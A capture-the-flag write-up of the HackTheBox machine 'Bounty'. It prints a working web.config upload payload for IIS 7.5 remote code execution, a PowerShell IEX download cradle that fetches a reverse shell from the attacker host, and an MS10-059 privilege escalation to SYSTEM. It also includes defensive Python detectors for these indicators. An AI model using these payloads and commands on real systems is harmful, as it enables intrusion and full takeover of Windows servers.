tl;dr

  • RCE by uploading web.config
  • Windows IIS 7.5
  • MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege

Solved by: 7h3M0nk

Bounty is a Windows box with IP 10.10.10.93. It’s been a while since I did a Windows box. This box taught me some important PowerShell one-liners that can be used to upload strings and files.

Initial Analysis

Starting with a basic port scan.

┌──(kali㉿kali)-[~/HackTheBox/Bounty/10.10.10.93/nmap]
└─$ cat Basic_10.10.10.93.nmap
# Nmap 7.91 scan initiated Wed Feb 17 02:36:57 2021 as: nmap -Pn -sCV -p80 -oN nmap/Basic_10.10.10.93.nmap 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up (0.33s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 17 02:37:13 2021 -- 1 IP address (1 host up) scanned in 16.30 seconds

MS IIS 7.5. I have some previous experience dealing with IIS servers; let’s add the box to /etc/hosts.

┌──(kali㉿kali)-[~/HackTheBox/Bounty/10.10.10.93/nmap]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
10.10.10.17 sup3rs3crt.brainfuck.htb www.brainfuck.htb brainfuck.htb
10.10.10.13 cronos.htb admin.cronos.htb
10.10.10.43 nineveh.htb
10.10.10.45 box.htb
10.10.10.25 wdac.htb
10.10.10.216 laboratory.htb
10.10.10.68 bashed.htb
10.10.10.93 bounty.htb

Opening bounty.htb.

IIS

Checking the page source also didn’t give me much information.

The next step is to fuzz for directories and files. As it is an IIS server, I will be looking for .aspx files.

┌──(kali㉿kali)-[~/HackTheBox/Bounty/recon]
└─$ gobuster dir -u http://bounty.htb -x aspx -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://bounty.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: aspx
[+] Timeout: 10s
===============================================================
2021/03/27 08:09:55 Starting gobuster in directory enumeration mode
===============================================================
/aspnet_client (Status: 301) [Size: 155] [--> http://bounty.htb/aspnet_client/]
/transfer.aspx (Status: 200) [Size: 941]
/uploadedfiles (Status: 301) [Size: 155] [--> http://bounty.htb/uploadedfiles/]

===============================================================
2021/03/27 08:13:00 Finished
===============================================================

transfer.aspx looks interesting.

Transfer

I will be able to upload files to the server, nice. Is there any RCE based on file uploads in IIS 7.5? A quick search led me to a blog post showing that uploading a web.config file containing ASP code can be used to execute remote commands.

Exploit

The first step is to confirm that I can upload a web.config file and check whether RCE is possible. Once uploaded, the config file might be present in the uploadedfiles directory.

┌──(kali㉿kali)-[~/HackTheBox/Bounty/exploit]
└─$ cat web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!--
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("net user")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-->
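From the defender's side, the hallmarks of this technique are visible in the uploaded file itself: a handler mapping that sends *.config through asp.dll, request-filtering rules that un-hide web.config, and script tags after the root element. The following added audit script (my own example, not part of the original post) flags those indicators in a web.config found in an upload directory; the sample config it checks is constructed here, with the ASP body replaced by a placeholder, and the engine list and messages are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample (not the file from the box) carrying the three hallmarks of the
# technique above: *.config handled by asp.dll, filtering exceptions, trailing ASP.
SUSPICIOUS_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll" resourceType="Unspecified" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions><remove fileExtension=".config" /></fileExtensions>
        <hiddenSegments><remove segment="web.config" /></hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- <% Response.write("placeholder") %> -->
"""

# Assumed list of script engines that should never be mapped from an upload directory.
SCRIPT_ENGINES = ("asp.dll", "aspnet_isapi.dll", "php-cgi.exe")

def audit_web_config(text):
    """Return a list of findings for one web.config; an empty list means nothing suspicious."""
    findings = []
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        # Script placed after the root element outside a comment makes the file ill-formed.
        findings.append("not well-formed XML (content after the root element?)")
        root = None
    if root is not None:
        for h in root.iter("add"):  # handler mappings and any other <add> elements
            proc = h.get("scriptProcessor", "").lower()
            if h.get("path") == "*.config" or proc.endswith(SCRIPT_ENGINES):
                findings.append(f"handler '{h.get('name')}' maps {h.get('path')} to {proc}")
        for r in root.iter("remove"):
            if r.get("fileExtension") == ".config":
                findings.append("request filtering: .config extension un-blocked")
            if r.get("segment", "").lower() == "web.config":
                findings.append("request filtering: web.config hidden segment removed")
    # ASP wrapped in a comment after </configuration> still parses as XML, so check the raw text.
    if re.search(r"<%.*?%>", text, re.S):
        findings.append("inline ASP '<% ... %>' present in the file")
    return findings
```

Running `audit_web_config` over every web.config under a writable upload root gives an inventory check; the same indicators can be fed to a file-integrity monitor on the upload directory.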

RCE

Yeah!! It works. Time to pop a reverse shell. I will be using PowerShell for this. I tried different payloads; the implementation from nishang worked. Added a line to invoke the shell at the end.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 4242

Need to make some changes to the web.config file.

Set cmd1 = wShell1.Exec("cmd /c powershell IEX (New-Object Net.WebClient).downloadstring('http://10.10.14.2:8000/reverse.ps1')")

This will allow me to download the reverse shell as a string and then execute it.
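The chain this produces on the server is distinctive: the IIS worker process (w3wp.exe) spawns cmd.exe, which runs a PowerShell download-and-execute cradle. The added triage function below (my example, not from the original post) scores constructed Sysmon-style process-creation records for exactly those two signals; the field names and the sample records are assumptions.

```python
import re

# Constructed process-creation records, not taken from the box. The first two mirror the
# chain described above (w3wp.exe -> cmd.exe -> powershell with IEX + DownloadString);
# the third is routine administration and should not be flagged.
EVENTS = [
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c powershell IEX (New-Object Net.WebClient).downloadstring('http://10.10.14.2:8000/reverse.ps1')"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell IEX (New-Object Net.WebClient).downloadstring('http://10.10.14.2:8000/reverse.ps1')"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File C:\\scripts\\rotate-logs.ps1"},
]

SHELLS = ("cmd.exe", "powershell.exe")
# Invoke-Expression (or its IEX alias) followed by a WebClient download call.
CRADLE = re.compile(r"(?:\bIEX\b|Invoke-Expression).*?(?:Net\.WebClient|Download(?:String|File))", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def triage(events):
    """Return [(index, reasons)] for every event that matches at least one rule."""
    flagged = []
    for i, ev in enumerate(events):
        reasons = []
        if basename(ev["ParentImage"]) == "w3wp.exe" and basename(ev["Image"]) in SHELLS:
            reasons.append("IIS worker process spawned a shell")
        if CRADLE.search(ev["CommandLine"]):
            reasons.append("PowerShell download-and-execute cradle in command line")
        if reasons:
            flagged.append((i, reasons))
    return flagged
```

An event that trips both rules is the strongest signal; the cradle rule alone also catches the child powershell.exe record, whose parent is cmd.exe rather than w3wp.exe.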

┌──(kali㉿kali)-[~]
└─$ curl -v http://10.10.10.93/uploadedfiles/web.config
* Trying 10.10.10.93:80...
* Connected to 10.10.10.93 (10.10.10.93) port 80 (#0)
> GET /uploadedfiles/web.config HTTP/1.1
> Host: 10.10.10.93
> User-Agent: curl/7.72.0
> Accept: */*
>

┌──(kali㉿kali)-[~/HackTheBox/Bounty/exploit]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.93 - - [27/Mar/2021 23:47:46] "GET /reverse.ps1 HTTP/1.1" 200 -

┌──(kali㉿kali)-[~/HackTheBox/Bounty/exploit]
└─$ nc -nvlp 4242
listening on [any] 4242 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.93] 49168
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>cd C:\Users\merlin\Desktop
PS C:\Users\merlin\Desktop> type user.txt

Owned user. Moving on to root.

PrivEsc

Let’s get the system info and check it with windows-exploit-suggester.

PS C:\Users\merlin\Desktop> systeminfo

Host Name: BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3606965-84760
Original Install Date: 5/30/2018, 12:22:24 AM
System Boot Time: 3/27/2021, 9:51:36 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,676 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,369 MB
Virtual Memory: In Use: 726 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.93

Checking with the exploit suggester shows that there are multiple candidate vulnerabilities for privesc.

┌──(kali㉿kali)-[~/HackTheBox/Bounty/exploit]
└─$ cat exploitsuggester.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical

Trying each exploit to see whether any worked, MS10-059 did. To upload the executable, I had to move to a directory that allowed file creation.

C:\Users\merlin\AppData\Local\Temp

Now let’s modify the config file to upload the executable and save it to the directory mentioned above.

PS C:\Users\merlin\AppData\Local\Temp> (New-Object Net.WebClient).downloadfile('http://10.10.14.2:8000/privesc.exe', 'C:\Users\merlin\AppData\Local\Temp\privesc.exe')

PS C:\Users\merlin\AppData\Local\Temp> dir


Directory: C:\Users\merlin\AppData\Local\Temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 5/30/2018 12:24 AM HWI29DD.tmp.dir
d---- 5/30/2018 12:22 AM Low
d---- 5/30/2018 4:42 AM vmware-merlin
d---- 5/30/2018 12:22 AM {2200E27C-064E-4F0D-A6B3-4A757BE0C
BDF}~setup
-a--- 5/30/2018 5:49 AM 31832 merlin.bmp
-a--- 3/27/2021 7:43 PM 784384 privesc.exe
-a--- 5/30/2018 12:13 AM 79848 storePwd.exe
-a--- 5/30/2018 12:13 AM 24 storePwd.ini
-a--- 5/30/2018 12:13 AM 555 unattend.cmd
-a--- 5/30/2018 12:13 AM 608744 upgrader.exe
-a--- 5/30/2018 12:33 AM 194894 vminst.log
-a--- 5/30/2018 12:24 AM 3292920 vmmsi.log


PS C:\Users\merlin\AppData\Local\Temp> ./privesc.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
PS C:\Users\merlin\AppData\Local\Temp> ./privesc.exe 10.10.14.2 4241



┌──(kali㉿kali)-[~/HackTheBox/Bounty/exploit]
└─$ nc -nvlp 4241
listening on [any] 4241 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.93] 49171
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\merlin\AppData\Local\Temp>whoami
whoami
nt authority\system

C:\Users\merlin\AppData\Local\Temp>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt

And that is how I pwned Bounty!